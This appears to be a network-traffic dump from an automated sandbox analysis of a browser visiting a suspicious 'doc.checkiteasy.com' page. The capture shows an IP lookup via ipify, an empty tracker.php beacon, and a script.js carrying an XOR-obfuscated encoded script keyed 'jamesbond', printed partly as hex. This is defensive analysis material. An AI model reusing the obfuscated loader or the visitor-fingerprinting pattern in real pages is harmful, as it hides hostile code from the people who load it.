                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: image
                                                Referer: https://5mzcue1v.doc.checkiteasy.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-23 14:21:27 UTC255INHTTP/1.1 200 OK
                                                Date: Mon, 23 Dec 2024 14:21:27 GMT
                                                Server: Apache
                                                Upgrade: h2
                                                Connection: Upgrade, close
                                                Last-Modified: Thu, 19 Dec 2024 23:39:15 GMT
                                                ETag: "421-629a809c618d9"
                                                Accept-Ranges: bytes
                                                Content-Length: 1057
                                                Content-Type: image/png
                                                2024-12-23 14:21:27 UTC1057INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 6c 00 00 00 18 08 06 00 00 00 1f d5 18 1a 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 03 d3 49 44 41 54 68 de ed 58 4d 4e db 50 10 fe 5c b1 45 f1 0d 92 f6 02 b8 27 20 2c da 2d e9 ba 8b 24 27 c0 48 b3 8f d9 8f 14 73 02 8c d4 ae 31 db 76 51 e7 06 c9 01 aa 9a 13 34 e9 05 d2 cd 0c 1a 06 1b 0c 2d c2 91 3c 92 17 ef f9 fd cc 7b df fc 7c f3 82 3f a3 77 5b 34 94 fd ab 9f 41 f2 3d 68 3c 3e f9 b0 0d d0 c9 7f 95 37 dd 15 74 80 75 f2 82 b2 d7 5d 41 7b 84 88 26 00 06 d2 2c 98 b9 68 05 60 44 34 00 30 31 5d 95 ca d5 1c 04 cc 9c 48 7f 26 fd c9 43 f3 77 00 a8 10 40 01 e0 c0 fd 2a da e2 61 03 00 33 d3 be 03 48 c5 61 52 00 3d cb 67 88 28 02 30 d6 36 80 e1 0e 3b 57 6c c0 da 00 58 02 58 cb f9 47
                                                Data Ascii: PNGIHDRlpHYs~IDAThXMNP\E' ,-$'Hs1vQ4-<{|?w[4A=h<>7tu]A{&,h`D401]H&Cw@*a3HaR=g(06;WlXXG


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                17192.168.2.549771104.17.24.144434372C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-23 14:21:29 UTC665OUTGET /ajax/libs/font-awesome/6.0.0/webfonts/fa-solid-900.woff2 HTTP/1.1
                                                Host: cdnjs.cloudflare.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                Origin: https://5mzcue1v.doc.checkiteasy.com
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: cross-site
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: font
                                                Referer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-23 14:21:29 UTC967INHTTP/1.1 200 OK
                                                Date: Mon, 23 Dec 2024 14:21:29 GMT
                                                Content-Type: application/octet-stream; charset=utf-8
                                                Content-Length: 126828
                                                Connection: close
                                                Access-Control-Allow-Origin: *
                                                Cache-Control: public, max-age=30672000
                                                ETag: "620188b3-1ef6c"
                                                Last-Modified: Mon, 07 Feb 2022 21:01:39 GMT
                                                cf-cdnjs-via: cfworker/kv
                                                Cross-Origin-Resource-Policy: cross-origin
                                                Timing-Allow-Origin: *
                                                X-Content-Type-Options: nosniff
                                                CF-Cache-Status: MISS
                                                Expires: Sat, 13 Dec 2025 14:21:29 GMT
                                                Accept-Ranges: bytes
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i6zfzc9eUQavowtYn3KKNLJ4N0DMcj%2B3XB0cxMloZAZSDDLBiYXRaoQrJBdAm5z%2BLwaenkf7vKhznKBhyKfEIlzTq5cW5HUPVA84tLJJj%2BpplxJK%2FBUFOUrvyNo6rmlXGPnKVYOl"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                Strict-Transport-Security: max-age=15780000
                                                Server: cloudflare
                                                CF-RAY: 8f68ff92cab942a9-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-12-23 14:21:29 UTC402INData Raw: 77 4f 46 32 00 01 00 00 00 01 ef 6c 00 0a 00 00 00 04 66 50 00 01 ef 21 03 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 38 02 24 04 20 06 60 03 a3 24 00 81 88 68 ca 8f f3 30 cb a3 28 05 87 70 07 20 a5 27 33 92 91 01 40 58 9d 00 00 a8 76 7b 1e 22 2a 9a 3d 3c 44 a4 ad b3 07 40 55 55 55 55 33 12 02 3b 54 35 00 f0 ff c1 8f 7e f2 b3 5f fc ea 37 bf fb c3 9f fe f2 b7 7f fc eb 3f fe eb 7f fe ef 3f 04 06 c7 04 7c 98 96 ed b8 9e cf 6f f8 ef 7f 3f 7e fb cc 7b 5f 7c 30 bf 88 87 84 0f 66 c9 e5 ff 8f 6a 1a 24 35 bc b3 fa 8d 94 44 69 2c 1a d7 c2 5c 0a 48 92 15 cf 26 29 30 c3 8b f1 17 c9 e7 02 6f 09 1f a3 91 b7 ea aa 8f 4c 41 04 d7 16 7b d7 3b b5 2f cb 54 3c 07 35 77 01 36 cf 5a 15 e2 b0 0c 6e d2 e9 40 f2 65 e3 27 c0 e3 37 86 a6 bd fc 14 2e 03
                                                Data Ascii: wOF2lfP!8$ `$h0(p '3@Xv{"*=<D@UUUU3;T5~_7??|o?~{_|0fj$5Di,\H&)0oLA{;/T<5w6Zn@e'7.
                                                2024-12-23 14:21:29 UTC1369INData Raw: 52 1a 82 90 04 42 ac 10 51 36 a8 41 c6 12 c9 5a 42 7c 36 8c 1c 1e c8 c6 b0 38 e2 a8 96 53 5c 9b ff 6d 3f 27 46 8e 38 af 33 0e f4 1e 91 d5 ac 8c ec aa ca ca aa ca 2c e3 ba 7d 75 d7 74 57 8f af 9a 9a ee 1a b3 bb d3 eb 07 76 61 07 27 86 95 a1 01 dd 02 12 92 06 c1 49 8b cc d3 c8 02 e7 e6 0c d2 ca d2 e7 41 76 e4 2c 8d ce b9 95 e7 f4 46 23 e7 f7 3c 77 7f 57 f3 f3 b4 52 fb af 73 81 aa ea 16 50 03 57 77 57 f7 50 77 4f d3 48 9a d1 b4 80 2c 59 1e d9 96 65 8a 3d c6 38 46 d9 01 3b e8 09 ae 93 25 25 fb b2 09 7b 42 b8 fa 59 ca be b7 9b 4c 16 13 d6 12 46 9b bf 04 5e 82 b4 e0 79 80 6f 6d 7f ee 85 81 f9 c2 0c f3 81 bf b3 7c 76 f6 33 e8 ec f2 1b 95 dd 9d cd 49 51 51 47 45 c5 15 75 76 45 45 45 17 0d 95 6d c9 9d f5 a1 d2 93 14 15 75 56 c7 1c 0d 15 5d d4 51 f7 83 85 45 49 86
                                                Data Ascii: RBQ6AZB|68S\m?'F83,}utWva'IAv,F#<wWRsPWwWPwOH,Ye=8F;%%{BYLF^yom|v3IQQGEuvEEEmuV]QEI
                                                2024-12-23 14:21:29 UTC1369INData Raw: d2 0e d2 7a b5 b6 8d 13 27 66 2c 6b 1b bb 5d 3b 79 ce 54 e5 5c 55 d4 0e ce 83 3a 93 af 8a cb ec c3 33 43 46 a3 e3 46 64 df 58 d6 31 cf 97 5e 7f 8d 74 55 c8 54 15 f3 a2 df 92 68 2d 07 d7 a6 36 31 10 b4 a5 9c d3 4b 92 7e 0d cf 07 0f 61 51 fb e7 4c 1c f6 5f 0c bd 7d cd 9e 10 a7 7c 8e 8d e3 a9 b1 ae d3 c4 81 97 e5 b5 c4 43 c6 c3 9c 93 26 df 1f b4 4a 31 61 9e b9 73 7e 27 37 3a 91 4b 6e 7c c5 96 27 32 ae db bd d0 59 d0 ed 2f 21 99 d6 6f bd 91 1c 7f 28 55 5d dd bd 65 8d 34 7e 5f e4 5f 93 6c b1 e8 75 cc 2d 06 ab 0d 6d 37 e7 06 18 cf 78 57 8b af 79 1e 8f cb 98 a9 b3 b5 f4 73 9b cb 57 f6 c8 6c 9d 8d 17 fb 39 cf 8f c2 c7 91 c3 f3 5d c0 87 f1 bc be a9 5d 79 e4 8c 2f cc 8f 71 f0 76 79 56 88 af e9 af 41 6f b3 6f 1b 7d cd 9e 3c 98 79 1a e0 2b 79 e6 e5 ad c3 df b3 43 a5
                                                Data Ascii: z'f,k];yT\U:3CFFdX1^tUTh-61K~aQL_}|C&J1as~'7:Kn|'2Y/!o(U]e4~__lu-m7xWysWl9]]y/qvyVAoo}<y+yC
                                                2024-12-23 14:21:29 UTC1369INData Raw: 92 63 38 8e 93 19 f9 17 ff 11 47 b2 4b 4e 29 20 85 a4 a4 94 95 2a 52 4d 6a 49 0b 69 2d ed a4 93 f4 90 7e 32 50 86 c9 28 99 22 d3 64 9e ac 90 35 b2 5e 36 cb 76 d9 2f 07 e5 b8 9c 96 b3 72 51 ae c9 4d 79 28 4f e5 85 bc 96 b7 f2 41 be 8a 8b b8 89 87 04 48 8c 24 49 aa a0 18 11 f9 6d d3 da 4c 36 ab cd 66 b3 db 1c 36 b7 cd 6b 0b da c2 b6 aa ad 65 5b da ae b6 bb ed 6d fb d9 71 76 86 5d 62 57 d8 b5 76 93 dd 63 0f d9 37 f6 bb f5 b7 d1 f6 ff ff ff 8e e3 94 71 ca 39 55 9d da 4e 73 67 8c 33 d6 19 e7 8c 77 26 38 13 9d 7d f4 8c 86 84 6d 08 3b 74 46 91 e1 75 c2 9b 1c 9f a3 d3 95 69 dd f9 bc 9d a2 a6 47 2d 8c 5a 1a b5 3b ea b2 72 54 3a 95 5e 65 54 99 54 ee d2 5e 68 9f 32 aa b5 6a 33 d5 49 f5 6e 8d 3e ef a9 6a b6 5a ad d6 a9 1d 6a b7 da f7 79 8e ab d3 ea ac 3a a7 6e ab d7
                                                Data Ascii: c8GKN) *RMjIi-~2P("d5^6v/rQMy(OAH$ImL6f6ke[mqv]bWvc7q9UNsg3w&8}m;tFuiG-Z;rT:^eTT^h2j3In>jZjy:n
                                                2024-12-23 14:21:29 UTC1369INData Raw: e2 1f 17 ad 21 df 39 cb 70 db c4 26 ce 73 9e 5c 72 79 44 01 25 bc e1 b2 1d b3 74 ae f2 9f a9 4c 67 32 53 ad ba 55 b7 fa ac a6 3e ab 19 69 23 d9 c4 26 9e b0 83 d6 b4 b6 be 94 a7 21 b5 a9 48 4d 4a f3 99 22 4a 53 5a 7f b2 c7 4a d3 19 61 aa fe a5 35 2d d9 48 43 1b 6a 3d 99 68 3d a9 6a 6d ad ab b5 b7 b2 56 d5 ca 5b 79 ab 6a a9 b4 67 35 4b 59 ca 35 6e 71 8b 22 4a 28 d1 4c 26 32 90 fe f4 e5 09 d7 b8 c5 35 8a c8 a3 88 54 a6 ea 09 6e 68 91 be a0 37 bd e9 4d 47 7a d2 9e ee 74 d7 f7 fa 96 ce 54 64 0b cf 28 e1 9a 5e e4 2a fb b8 c1 65 4e 68 b6 66 6a ba de d3 4c 4e 52 93 9a f4 65 0f 3b b4 bf f6 d5 be da 9b 5d 1c 0a 9f a9 4f 5d 6d 4f f5 f0 39 7c 0c 8f c2 03 ad 1d 9e e9 54 26 d2 94 86 54 a4 33 1d 75 8f ba 88 88 88 c8 6b 4f f8 2d 12 d2 fe 7c d0 a7 1d 12 d1 86 22 7a 44 4f
                                                Data Ascii: !9p&s\ryD%tLg2SU>i#&!HMJ"JSZJa5-HCj=h=jmV[yjg5KY5nq"J(L&25Tnh7MGztTd(^*eNhfjLNRe;]O]mO9|T&T3ukO-|"zDO
                                                2024-12-23 14:21:29 UTC1369INData Raw: 45 88 b9 a8 17 23 7e a0 5e 82 f8 91 7a 29 e2 27 ea 65 88 ef a8 97 23 7e a6 5e 81 f8 9e 7a 25 e2 17 ea 55 88 5f a9 57 23 d6 a1 5e a3 c1 de 0c 88 df a8 f7 21 9e a5 de 8f dc 9b fa a8 8e 4b fb 18 a0 bc 4e 7d 1c e5 1f ea 07 88 69 a9 5f a1 3c 4b fd 1a f9 21 7a 68 ba df d1 37 0b d3 fd 85 ce 9b 4c f7 6f 59 e5 d1 d2 5b a3 4c e1 0f e4 ce d4 55 df f6 dd 7a ce f6 03 ca 51 d4 43 51 e6 a5 1e 86 ce a7 d4 c3 51 8d a2 1e 81 6a 6c ea d1 a8 56 a3 1e 13 9d ed a8 c7 42 67 5b ea b1 e1 02 ea 71 f4 6d c7 05 b8 90 7a 3c 0d 76 52 40 e7 46 ea 29 d1 79 81 7a 0e e8 a7 5e 1a d5 52 d4 cb 6a b0 2b 83 e6 6b 57 05 54 4b 50 af 05 e3 50 af ad 6f bb 0e 2c f8 7b 22 65 bd 1e e8 db 6e 0d 70 26 f5 39 30 88 fa 5c e8 51 9f 87 ea 3b 66 98 1b d5 76 cc 30 0f aa 6d 99 69 24 aa 0d 98 69 62 54 27 32 d3
                                                Data Ascii: E#~^z)'e#~^z%U_W#^!KN}i_<K!zh7LoY[LUzQCQQjlVBg[qmz<vR@F)yz^Rj+kWTKPPo,{"enp&90\Q;fv0mi$ibT'2
                                                2024-12-23 14:21:29 UTC1369INData Raw: 7c 8c 98 83 7c 1c 0d 63 4e f2 69 f2 25 62 2e f2 15 f2 75 62 21 f2 0d 24 c4 5e e4 fb e4 07 c4 62 e4 97 40 2c 41 7e 8d 58 92 fc 0e b1 14 f9 63 c3 58 9a fc 95 4c 62 19 b2 27 7f 23 96 23 ff 04 62 05 f2 bf 9a 58 91 16 b4 41 47 eb 87 b4 61 b4 91 c4 6a b4 89 88 58 8b 36 0d 62 6d da 6c 35 ee a4 cd 4d 9b e7 38 4b 5f 5b 87 b6 7e 4e 50 b6 0d 2f 88 8d 68 9b 24 c4 c6 b4 cd 68 9b 13 9b d0 0e 05 ba 85 69 87 25 74 8b d0 8e a2 1d 4d 6c 46 3b 05 88 2d 68 57 d6 c4 96 b4 87 68 0f e7 ee 65 7b 94 88 6d 68 4f 22 b6 a5 3d 9b 10 db d1 5e a4 bd 44 6c 4f 7b 15 88 1d 69 1f 22 76 a2 7d 82 d8 99 f6 25 62 17 da 8f 09 b1 2b ed 2f da df c4 6e b4 7f 81 01 e7 d1 fe 47 ec 41 0d 46 ec 49 8d 85 d8 8b 9a 0c b1 37 35 45 42 ec 43 cd 46 cd 41 ec 4b cd 85 84 38 80 9a 97 9a 8f 38 90 5a 00 88 83 a9
                                                Data Ascii: ||cNi%b.ub!$^b@,A~XcXLb'##bXAGajX6bml5M8K_[~NP/h$hi%tMlF;-hWhe{mhO"=^DlO{i"v}%b+/nGAFI75EBCFAK88Z
                                                2024-12-23 14:21:29 UTC1369INData Raw: bb 84 85 50 76 dc 25 2c 82 b2 df 35 0c 8b a1 1c 00 e5 20 08 4b a0 1c 06 e5 70 08 cb a1 1c 09 e5 18 08 2b a1 9c 86 bb 84 b5 50 ce d9 44 58 07 e5 51 28 8f 41 58 0f e5 45 dc 25 6c 84 f2 de 5d c2 26 28 5f dd c5 35 84 f2 bf 25 6c 46 bf 1d 62 c5 83 62 65 2b c1 a3 58 c3 8a 1f 86 62 4d 2b 7e 38 8a b5 ac f8 11 28 d6 b6 a2 86 28 36 b1 a2 cb 51 6c 63 c5 0d 46 b1 a3 15 ff 2f 8a 9d ac f8 bf 51 ec 61 25 4c 42 b1 8f 15 f7 28 8a 7d ad e8 1e 14 07 de 85 30 0d 45 2b aa 80 e2 4c 2b fe 48 14 67 51 59 6d a6 95 30 19 c5 ad 56 7c 5b 14 f7 b4 e2 26 a0 b8 8f 15 f7 0c 8a fb 5a f1 43 51 3c cc 0a 5f a3 78 b8 15 bd 8b e2 19 56 74 23 8a e7 58 71 0f a3 78 9e 15 b7 15 c5 8b ad 70 16 8a 97 58 d1 21 28 5e 63 85 eb 51 bc d6 8a fb 1f c5 9b ac f8 4b 50 bc dd 8a fb 0a c5 bb ac 70 2a 8a 8f 5a
                                                Data Ascii: Pv%,5 Kp+PDXQ(AXE%l]&(_5%lFbbe+XbM+~8((6QlcF/Qa%LB(}0E+L+HgQYm0V|[&ZCQ<_xVt#XqxpX!(^cQKPp*Z
                                                2024-12-23 14:21:29 UTC1369INData Raw: 33 50 98 6c c5 46 a2 30 c5 4a a2 11 85 a9 56 12 4d 28 4c b3 12 4d 43 61 81 95 e8 08 14 96 5a 49 8c 46 61 b9 95 44 11 85 35 56 12 93 51 38 d4 4a f4 36 0a e7 59 e1 14 14 ae b4 62 df a2 70 8b 15 fb 05 85 87 ac d8 29 28 3c 6a c5 8e 41 e1 35 2b ba 0e 85 2f ad d8 69 28 7c 45 b2 50 df d3 8a bd 82 c2 4f 56 b4 37 0a 3f 5b 89 ee 40 e1 57 2b d1 a5 28 fc 66 45 a7 a2 f0 87 15 1d 80 c2 9f 56 ac 88 c2 df 56 f8 13 85 7f ac 68 2a 0a c1 4a f4 19 0a 5b ad d8 df 28 fc 6f 85 59 28 f4 5b b1 08 55 0e b7 12 9d 83 2a 47 58 d1 14 54 39 ce 0a 75 a8 72 be 15 7b 17 55 ae b4 62 69 54 79 c4 4a f4 07 aa 3c 5f c2 2e bc 7e c1 bf 3e 06 9e d3 71 7a 8e 5a 1a 69 a5 93 61 a0 ae 64 9c 8c 8b f5 0d f5 0d 5d 7d e5 be 72 71 44 69 44 69 b0 4a dd 71 43 5c ac 29 37 0c 2d 97 ca 45 2d ea ff b2 b6 90 97
                                                Data Ascii: 3PlF0JVM(LMCaZIFaD5VQ8J6Ybp)(<jA5+/i(|EPOV7?[@W+(fEVVh*J[(oY([U*GXT9ur{UbiTyJ<_.~>qzZiad]}rqDiDiJqC\)7-E-
                                                2024-12-23 14:21:29 UTC1369INData Raw: 5c d7 0d c2 b9 38 fc 8e 7d 38 f1 3b 80 31 a1 c7 4f ed 00 8d 65 67 b7 f4 0b 35 9e 26 a0 64 15 a8 e4 fe f6 23 7b ed 4a e5 27 f3 fa 5e 6d 7e ed 53 ca 62 5a 83 14 ad ad fd fb c2 27 8e a4 19 3c 74 e4 f3 ad ad 1d e2 8e 5a 8b cd e5 0f 15 b0 a7 4d 3f 8e d3 f4 68 bf 3c 64 0a 07 a8 8a 7a 08 f9 16 e6 25 ad de e6 18 42 49 18 27 67 d1 34 1b a4 99 a3 3d 35 42 09 fd fc 94 01 58 96 2d ad 66 a9 5f 29 db b6 df 4d ae ac 9e 30 3d 4a 78 d6 c5 a1 7e bd 2d 38 33 ed ac 96 27 49 a9 54 f7 c0 fa c9 b5 ae 7e d5 3b 55 e9 eb c4 a5 a5 4a 19 64 38 a3 80 10 68 e4 d5 f1 4d cc 1b 35 e3 e0 d0 63 87 96 67 9a 5c d3 c8 2f fc 8a 12 2e 01 90 67 99 26 5c 58 cc 1c 9d 0a ce 61 cf 58 4a ca 71 ae 03 c7 cb 9e 57 43 03 74 1a a1 8e 22 a8 87 10 7b 0e 05 55 37 b2 b4 67 20 d8 e5 52 92 66 32 70 fd 92 ac bf
                                                Data Ascii: \8}8;1Oeg5&d#{J'^m~SbZ'<tZM?h<dz%BI'g4=5BX-f_)M0=Jx~-83'IT~;UJd8hM5cg\/.g&\XaXJqWCt"{U7g Rf2p


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                18192.168.2.549773104.26.12.2054434372C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-23 14:21:29 UTC579OUTGET /?format=json HTTP/1.1
                                                Host: api.ipify.org
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Origin: https://5mzcue1v.doc.checkiteasy.com
                                                Sec-Fetch-Site: cross-site
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://5mzcue1v.doc.checkiteasy.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-23 14:21:29 UTC463INHTTP/1.1 200 OK
                                                Date: Mon, 23 Dec 2024 14:21:29 GMT
                                                Content-Type: application/json
                                                Content-Length: 21
                                                Connection: close
                                                Access-Control-Allow-Origin: *
                                                Vary: Origin
                                                cf-cache-status: DYNAMIC
                                                Server: cloudflare
                                                CF-RAY: 8f68ff93bc0542c2-EWR
                                                server-timing: cfL4;desc="?proto=TCP&rtt=1576&min_rtt=1574&rtt_var=594&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=1157&delivery_rate=1836477&cwnd=240&unsent_bytes=0&cid=15f9e6de10afa5c7&ts=451&x=0"
                                                2024-12-23 14:21:29 UTC21INData Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                Data Ascii: {"ip":"8.46.123.189"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                19192.168.2.549770135.225.111.1904434372C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-23 14:21:29 UTC366OUTGET /image/logo.png HTTP/1.1
                                                Host: 5mzcue1v.doc.checkiteasy.com
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-23 14:21:30 UTC255INHTTP/1.1 200 OK
                                                Date: Mon, 23 Dec 2024 14:21:29 GMT
                                                Server: Apache
                                                Upgrade: h2
                                                Connection: Upgrade, close
                                                Last-Modified: Thu, 19 Dec 2024 23:39:15 GMT
                                                ETag: "421-629a809c618d9"
                                                Accept-Ranges: bytes
                                                Content-Length: 1057
                                                Content-Type: image/png
                                                2024-12-23 14:21:30 UTC1057INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 6c 00 00 00 18 08 06 00 00 00 1f d5 18 1a 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 03 d3 49 44 41 54 68 de ed 58 4d 4e db 50 10 fe 5c b1 45 f1 0d 92 f6 02 b8 27 20 2c da 2d e9 ba 8b 24 27 c0 48 b3 8f d9 8f 14 73 02 8c d4 ae 31 db 76 51 e7 06 c9 01 aa 9a 13 34 e9 05 d2 cd 0c 1a 06 1b 0c 2d c2 91 3c 92 17 ef f9 fd cc 7b df fc 7c f3 82 3f a3 77 5b 34 94 fd ab 9f 41 f2 3d 68 3c 3e f9 b0 0d d0 c9 7f 95 37 dd 15 74 80 75 f2 82 b2 d7 5d 41 7b 84 88 26 00 06 d2 2c 98 b9 68 05 60 44 34 00 30 31 5d 95 ca d5 1c 04 cc 9c 48 7f 26 fd c9 43 f3 77 00 a8 10 40 01 e0 c0 fd 2a da e2 61 03 00 33 d3 be 03 48 c5 61 52 00 3d cb 67 88 28 02 30 d6 36 80 e1 0e 3b 57 6c c0 da 00 58 02 58 cb f9 47
                                                Data Ascii: PNGIHDRlpHYs~IDAThXMNP\E' ,-$'Hs1vQ4-<{|?w[4A=h<>7tu]A{&,h`D401]H&Cw@*a3HaR=g(06;WlXXG


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                20192.168.2.549769135.225.111.1904434372C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-23 14:21:29 UTC361OUTGET /script.js HTTP/1.1
                                                Host: 5mzcue1v.doc.checkiteasy.com
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-23 14:21:30 UTC286INHTTP/1.1 200 OK
                                                Date: Mon, 23 Dec 2024 14:21:29 GMT
                                                Server: Apache
                                                Upgrade: h2
                                                Connection: Upgrade, close
                                                Last-Modified: Sun, 22 Dec 2024 12:49:11 GMT
                                                ETag: "31e6-629db4e740e58"
                                                Accept-Ranges: bytes
                                                Content-Length: 12774
                                                Vary: Accept-Encoding
                                                Content-Type: text/javascript
                                                2024-12-23 14:21:30 UTC7906INData Raw: 76 61 72 20 6b 65 79 20 3d 20 22 6a 61 6d 65 73 62 6f 6e 64 22 3b 0a 76 61 72 20 65 6e 63 6f 64 65 64 53 63 72 69 70 74 20 3d 20 22 44 67 34 4f 45 42 34 48 41 52 70 4b 43 77 55 4a 49 41 55 48 41 52 6f 6f 41 78 49 5a 41 42 30 48 48 55 5a 44 4c 69 34 67 4a 68 77 4d 47 77 73 4b 48 69 30 43 42 42 63 48 43 30 6c 49 53 67 41 65 48 42 30 42 54 30 5a 4e 53 6c 78 54 52 51 68 76 5a 55 35 45 53 6b 45 42 41 41 64 43 44 68 73 51 42 51 59 66 42 42 45 41 43 67 6f 68 42 77 41 45 43 56 4e 66 54 30 6c 44 55 57 78 6e 52 56 4e 43 54 77 30 4c 42 42 49 5a 52 52 6f 52 49 67 45 47 41 77 30 49 52 55 35 43 51 41 63 30 41 67 34 44 41 41 38 4c 50 77 38 41 46 67 67 39 43 68 63 65 4c 67 41 41 47 41 34 45 41 56 77 4c 51 52 6f 42 47 52 56 46 43 78 49 55 42 67 6b 46 48 67 34 66 53 77 59
                                                Data Ascii: var key = "jamesbond";var encodedScript = "Dg4OEB4HARpKCwUJIAUHARooAxIZAB0HHUZDLi4gJhwMGwsKHi0CBBcHC0lISgAeHB0BT0ZNSlxTRQhvZU5ESkEBAAdCDhsQBQYfBBEACgohBwAECVNfT0lDUWxnRVNCTw0LBBIZRRoRIgEGAw0IRU5CQAc0Ag4DAA8LPw8AFgg9ChceLgAAGA4EAVwLQRoBGRVFCxIUBgkFHg4fSwY
                                                2024-12-23 14:21:30 UTC4868INData Raw: 51 61 4b 52 59 45 47 30 35 5a 53 69 77 4d 45 52 74 4d 41 67 38 63 51 6c 56 42 52 54 34 44 47 77 5a 4b 42 77 67 44 54 52 30 48 47 43 49 42 44 42 56 42 52 52 34 44 46 79 49 42 44 42 56 45 54 45 68 76 5a 55 35 45 53 6b 46 4e 52 56 4e 43 54 30 35 45 53 67 4d 59 45 51 63 4e 41 55 41 58 48 68 67 42 41 46 30 4f 43 67 67 51 53 6c 78 4e 42 56 63 5a 41 51 73 54 4a 67 51 4c 45 51 34 53 46 77 35 66 5a 32 74 4e 52 56 4e 43 54 30 35 45 53 6b 46 4e 52 56 4d 57 48 51 38 48 41 55 38 65 45 51 6f 4f 43 6b 41 54 41 77 55 5a 44 56 4e 66 54 77 35 41 45 51 38 49 45 6a 38 48 43 52 70 45 51 55 45 50 45 41 63 57 41 41 42 4b 43 51 30 45 41 42 30 57 4f 41 63 41 48 67 6c 43 56 77 34 53 46 77 35 66 5a 32 74 67 62 31 4e 43 54 30 35 45 53 6b 46 4e 52 56 4e 43 54 77 63 43 53 6b 6b 44 41
                                                Data Ascii: QaKRYEG05ZSiwMERtMAg8cQlVBRT4DGwZKBwgDTR0HGCIBDBVBRR4DFyIBDBVETEhvZU5ESkFNRVNCT05ESgMYEQcNAUAXHhgBAF0OCggQSlxNBVcZAQsTJgQLEQ4SFw5fZ2tNRVNCT05ESkFNRVMWHQ8HAU8eEQoOCkATAwUZDVNfTw5AEQ8IEj8HCRpEQUEPEAcWAABKCQ0EAB0WOAcAHglCVw4SFw5fZ2tgb1NCT05ESkFNRVNCTwcCSkkDA


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                21192.168.2.549772135.225.111.1904434372C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-23 14:21:29 UTC363OUTGET /tracker.php HTTP/1.1
                                                Host: 5mzcue1v.doc.checkiteasy.com
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-23 14:21:30 UTC172INHTTP/1.1 200 OK
                                                Date: Mon, 23 Dec 2024 14:21:29 GMT
                                                Server: Apache
                                                Upgrade: h2
                                                Connection: Upgrade, close
                                                Content-Length: 0
                                                Content-Type: text/html; charset=UTF-8


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
